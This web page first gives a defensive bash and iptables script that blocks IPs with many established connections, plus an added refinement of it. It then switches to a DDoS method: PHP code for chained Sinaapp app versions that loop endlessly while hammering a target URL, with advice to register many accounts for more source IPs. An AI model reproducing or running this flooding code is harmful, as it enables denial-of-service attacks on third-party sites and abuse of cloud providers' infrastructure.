A shell script for defending a server against DDoS attacks
1. Write the script
mkdir /root/bin
vi /root/bin/dropip.sh
#!/bin/bash
/bin/netstat -na | grep ESTABLISHED | awk '{print $5}' | awk -F: '{print $1}' | sort | uniq -c | sort -rn | head -10 | grep -v -E '192.168|127.0' | awk '{if ($2!=null && $1>4) {print $2}}' > /tmp/dropip
for i in $(cat /tmp/dropip)
do
    # drop all traffic from this address and log the action with a timestamp
    /sbin/iptables -A INPUT -s $i -j DROP
    echo "$i kill at `date`" >> /var/log/ddos
done
2. Add execute permission
chmod +x /root/bin/dropip.sh
3. Add to scheduled tasks, run once per minute
crontab -e
*/1 * * * * /root/bin/dropip.sh
Description
The most important part is the second line of the script, which takes the top 10 IPs by established connections and writes those with more than 4 connections to the temporary file /tmp/dropip, excluding the internal IP ranges 192.168 and 127.0. The for loop then drops every IP listed in /tmp/dropip through iptables and records it in the log file /var/log/ddos.
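An added example, not part of the original page: a variant of the counting step that validates each address, anchors the internal-range exclusion, and skips addresses already recorded, so that the once-a-minute cron run does not append the same DROP rule again. The function names, the blocklist file argument and the sample connections are assumptions constructed for illustration.

```bash
#!/bin/bash
# Added example (not from the original page). Sample data is constructed.
THRESHOLD=4    # same cutoff as dropip.sh: more than 4 connections

# Read `netstat -na` style lines on stdin; print remote IPv4 addresses that
# hold more than $1 (default $THRESHOLD) ESTABLISHED connections.
offenders() {
    awk -v limit="${1:-$THRESHOLD}" '
        $6 == "ESTABLISHED" {
            if (split($5, part, ":") != 2) next      # skip IPv6 / malformed
            ip = part[1]
            if (ip !~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/) next
            if (ip ~ /^192\.168\./ || ip ~ /^127\./) next   # internal, anchored
            count[ip]++
        }
        END { for (ip in count) if (count[ip] > limit) print ip }
    ' | sort
}

# Read IPs on stdin; print and record only those not yet in blocklist file $1,
# so repeated runs do not stack duplicate rules for the same address.
new_only() {
    touch "$1"
    while read -r ip; do
        grep -qxF "$ip" "$1" && continue
        echo "$ip" >> "$1"
        echo "$ip"
    done
}

# Constructed sample: 6 connections from 203.0.113.7, 2 from 198.51.100.9,
# 5 from internal 192.168.1.20, plus one non-ESTABLISHED row.
sample_netstat() {
    for n in 1 2 3 4 5 6; do
        echo "tcp 0 0 10.0.0.5:80 203.0.113.7:4000$n ESTABLISHED"
    done
    for n in 1 2; do
        echo "tcp 0 0 10.0.0.5:80 198.51.100.9:5000$n ESTABLISHED"
    done
    for n in 1 2 3 4 5; do
        echo "tcp 0 0 10.0.0.5:80 192.168.1.20:6000$n ESTABLISHED"
    done
    echo "tcp 0 0 10.0.0.5:80 203.0.113.7:40009 TIME_WAIT"
}

# Dry run: print the rule that would be added for each newly seen offender.
dry_run() {
    sample_netstat | offenders | new_only "$1" |
        while read -r ip; do echo "/sbin/iptables -A INPUT -s $ip -j DROP"; done
}
```

On a live host the same functions take real input, for example `netstat -na | offenders | new_only /var/run/dropip.list`, with the blocklist path being a hypothetical choice.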
Another approach is a DDoS attack written in PHP that runs on a third-party cloud platform.
Sinaapp is used as the test platform here.
Test idea: create 4 versions of the app.
Version 1 home page code:
<?php
file_get_contents('http://2.mars.sinaapp.com/'); // version 1 triggers the attack (accesses version 2)
?>
Version 2 home page code:
<?php
file_get_contents('http://www.xxx.com/ip.php'); // attack target
file_get_contents('http://3.mars.sinaapp.com/'); // accesses version 3
?>
Version 3 home page code:
<?php
for ($i = 1; $i <= 10; $i++) { // a higher loop count increases the effect
    file_get_contents('http://www.xxx.com/ip.php');
    file_get_contents('http://4.mars.sinaapp.com/');
}
?>
Version 4 home page code:
<?php
file_get_contents('http://2.mars.sinaapp.com/'); // accesses version 2, resulting in an endless loop
?>
These are the steps for a single Sinaapp user; the approach can be extended by registering a large number of users and creating more versions. In testing, however, each app actually had two exit IPs, so it is better to use multiple users.